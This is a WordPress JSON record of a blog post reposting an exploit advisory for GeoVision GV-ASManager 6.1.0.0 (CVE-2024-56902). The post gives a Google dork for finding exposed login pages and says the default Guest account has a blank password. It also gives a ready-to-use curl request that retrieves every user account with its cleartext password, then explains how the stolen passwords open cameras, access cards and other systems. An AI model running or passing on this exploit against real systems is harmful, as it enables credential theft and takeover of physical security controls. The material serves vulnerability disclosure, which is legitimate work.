{"id":62577,"date":"2025-04-08T17:42:32","date_gmt":"2025-04-08T14:12:32","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/geovision-gv-asmanager-6-1-0-0-information-disclosure\/"},"modified":"2025-04-08T17:42:32","modified_gmt":"2025-04-08T14:12:32","slug":"geovision-gv-asmanager-6-1-0-0-information-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/geovision-gv-asmanager-6-1-0-0-information-disclosure\/","title":{"rendered":"GeoVision GV-ASManager 6.1.0.0 &#8211; Information Disclosure"},"content":{"rendered":"<p><\/p>\n<div>\n<pre><code class=\"language-txt\" style=\"white-space: pre-wrap;\"># Exploit Title: Information Disclosure in GeoVision GV-ASManager&#13;\n# Google Dork: inurl:\"ASWeb\/Login\"&#13;\n# Date: 02-FEB-2025&#13;\n# Exploit Author: Giorgi Dograshvili [DRAGOWN]&#13;\n# Vendor Homepage: https:\/\/www.geovision.com.tw\/&#13;\n# Software Link: https:\/\/www.geovision.com.tw\/download\/product\/&#13;\n# Version: 6.1.0.0 or less&#13;\n# Tested on: Windows 10 | Kali Linux&#13;\n# CVE : CVE-2024-56902&#13;\n# PoC: https:\/\/github.com\/DRAGOWN\/CVE-2024-56902&#13;\n&#13;\n&#13;\nInformation disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.&#13;\n&#13;\nRequirements&#13;\nTo perform successful attack an attacker requires:&#13;\n- GeoVision ASManager version 6.1.0.0 or less&#13;\n- Network access to the GV-ASManager web application (there are cases when there are public access)&#13;\n- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)&#13;\n&#13;\nImpact&#13;\nThe vulnerability can be leveraged to perform the following unauthorized actions:&#13;\nA low privilege account is able to:&#13;\n- Enumerate user accounts&#13;\n- Retrieve cleartext password of any account in GV-ASManager.&#13;\nAfter reusing the retrieved password, an attacker will be able to:&#13;\n- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.&#13;\n- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.&#13;\n- Disrupt and disconnect services such as monitoring cameras, access controls.&#13;\n- Clone and duplicate access control data for further attack scenarios.&#13;\n- Reusing retrieved password in other digital assets of the organization.&#13;\n&#13;\ncURL script:&#13;\n&#13;\ncurl --path-as-is -i -s -k -X $'POST' \\&#13;\n    -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \\\"Linux\\\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \\\"Not?A_Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"130\\\"' -H $'Content-Type: application\/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/130.0.6723.70 Safari\/537.36' -H $'Accept: *\/*' -H $'Origin: https:\/\/192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \\&#13;\n   -b $'[SET-COOKIE - WRITE WHAT IS AFTER \"Cookie:\"]' \\&#13;\n    --data-binary $'action=UA_GetAllUserAccount&amp;node=xnode-98' \\&#13;\n    $'[SET-TARGET]\/ASWeb\/bin\/ASWebCommon.srf'&#13;\n&#13;\n&#13;\nAfter a successful attack, you will get access to:&#13;\n- ASWeb\t- Access &amp; Security Management &#13;\n- TAWeb\t- Time and Attendance Management &#13;\n- VMWeb\t- Visitor Management &#13;\n- ASManager - Access &amp; Security Management software in OS\n            <\/blank><\/code><\/pre>\n<\/p><\/div>\n<p><a href=\"https:\/\/afaghhosting.net]\">\u0622\u0641\u0627\u0642 \u0647\u0627\u0633\u062a\u06cc\u0646\u06af \u0645\u062f\u06cc\u0631\u06cc\u062a \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0648\u0631 \u0648 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0641\u0646\u06cc <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Information Disclosure in GeoVision GV-ASManager&#13; # Google Dork: inurl:&#8221;ASWeb\/Login&#8221;&#13; # Date: 02-FEB-2025&#13; # Exploit Author: Giorgi Dograshvili [DRAGOWN]&#13; # Vendor Homepage: https:\/\/www.geovision.com.tw\/&#13; # Software Link: https:\/\/www.geovision.com.tw\/download\/product\/&#13; # Version: 6.1.0.0 or less&#13; # Tested on: Windows 10 | Kali Linux&#13; # CVE : CVE-2024-56902&#13; # PoC: https:\/\/github.com\/DRAGOWN\/CVE-2024-56902&#13; &#13; &#13; Information disclosure vulnerability in &hellip;<\/p>\n","protected":false},"author":1,"featured_media":62562,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-62577","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62577","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=62577"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62577\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media\/62562"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=62577"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=62577"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=62577"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}